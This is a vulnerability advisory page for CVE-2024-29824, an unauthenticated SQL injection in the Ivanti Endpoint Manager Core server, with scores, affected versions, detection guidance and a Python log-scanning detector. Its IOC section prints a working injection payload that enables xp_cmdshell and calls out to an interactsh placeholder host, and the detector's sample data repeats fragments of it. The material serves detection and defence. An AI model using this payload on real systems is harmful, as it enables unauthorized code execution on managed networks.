CVE-2024-29824
published 2024-05-31

Priority: P1 · 92 · high · 8.8 (CVSS 3.1)
Vector: AV:A / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2024-10-23
Exploited in the wild
EPSS: 99.95% (100.0th percentile)
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Affected (3 ranges)

Vendor | Product          | Version range       | Fixed in
ivanti | endpoint_manager | < 2022              | 2022
ivanti | endpoint_manager |                     |
ivanti | epm              | 2022 SU5 – 2022 SU5 |

Detection & IOCs (extracted from sources)

url: /WSStatusEvents/EventHandler.asmx
command: GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--
path: /WSStatusEvents/EventHandler.asmx
  • Review MS SQL logs for evidence of xp_cmdshell being used to obtain command execution on Ivanti EPM servers.
  • The SQL injection payload targets PatchBiz.dll via the EPM Core server; monitor for SQLi patterns in traffic to this component.
  • Detect exploitation attempts by monitoring POST requests to /WSStatusEvents/EventHandler.asmx with SOAP content-type containing SQL injection strings (e.g., sp_configure, xp_cmdshell) in the body.
  • A Check Point IPS signature is available for this vulnerability; deploy the named rule for network-level detection.
  • The Nuclei template confirms exploitation by matching 'UpdateStatusEventsResponse' in the HTTP response body and a DNS interaction via interactsh, indicating successful xp_cmdshell execution.
  • Exploitation requires the attacker to be on the same network as the Ivanti EPM Core server (adjacent network attack vector, AV:A); the vulnerability is not exploitable remotely from the internet.
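
The request-monitoring check described in the bullets above, as an added example (not code from this page or its sources). It assumes a hypothetical log schema with `method`, `path`, `content_type` and `body` fields; the sample records are constructed.

```python
import html
import re
from urllib.parse import unquote

# Endpoint and SQL keywords come from the detection notes above.
TARGET_PATH = "/wsstatusevents/eventhandler.asmx"  # compared lower-case (IIS paths are case-insensitive)
SQL_TOKENS = re.compile(r"\b(sp_configure|xp_cmdshell|reconfigure)\b", re.I)
QUOTE_BREAKOUT = re.compile(r"md5\s*=\s*'\s*;", re.I)  # md5 value closed and a new statement started

def normalize(body):
    """Undo percent and XML-entity encoding (up to 3 layers) so escaped bodies still match."""
    prev = None
    for _ in range(3):
        if body == prev:
            break
        prev, body = body, html.unescape(unquote(body))
    return body

def inspect(req):
    """Return the list of findings for one request record; empty means no match."""
    path = unquote(req["path"].split("?", 1)[0]).lower()
    if req["method"].upper() != "POST" or path != TARGET_PATH:
        return []
    if "xml" not in req.get("content_type", "").lower():  # text/xml or application/soap+xml
        return []
    body = normalize(req.get("body", ""))
    findings = sorted({m.lower() for m in SQL_TOKENS.findall(body)})
    if QUOTE_BREAKOUT.search(body):
        findings.append("quote-breakout")
    return findings

# Constructed sample records (hypothetical log schema: method, path, content_type, body).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/WSStatusEvents/EventHandler.asmx", "content_type": "text/xml",
     "body": "<x>GoodApp=1|md5=d41d8cd98f00b204e9800998ecf8427e</x>"},
    {"method": "POST", "path": "/wsstatusevents/EventHandler.ASMX", "content_type": "application/soap+xml",
     "body": "<x>GoodApp=1|md5=&apos;; EXEC sp_configure &apos;xp_cmdshell&apos;, 1; RECONFIGURE--</x>"},
    {"method": "POST", "path": "/WSStatusEvents/EventHandler.asmx", "content_type": "text/xml",
     "body": "<x>GoodApp=1|md5=%2527%3B EXEC xp_cmdshell</x>"},
    {"method": "POST", "path": "/other/Service.asmx", "content_type": "text/xml",
     "body": "<x>notes mention xp_cmdshell</x>"},
]

def scan(requests):
    """Return (index, findings) for every record that matched."""
    return [(i, f) for i, r in enumerate(requests) if (f := inspect(r))]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: {', '.join(found)}")
```

A keyword match like this is a triage heuristic: correlate hits with the MS SQL log review for xp_cmdshell use noted above before treating a host as compromised.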

CVSS provenance

nvd       | v3.1 | 8.8 | HIGH     | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd       | v3.0 | 9.6 | CRITICAL | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck |      | 8.8 | HIGH     |
cisa      |      | 8.8 | HIGH     |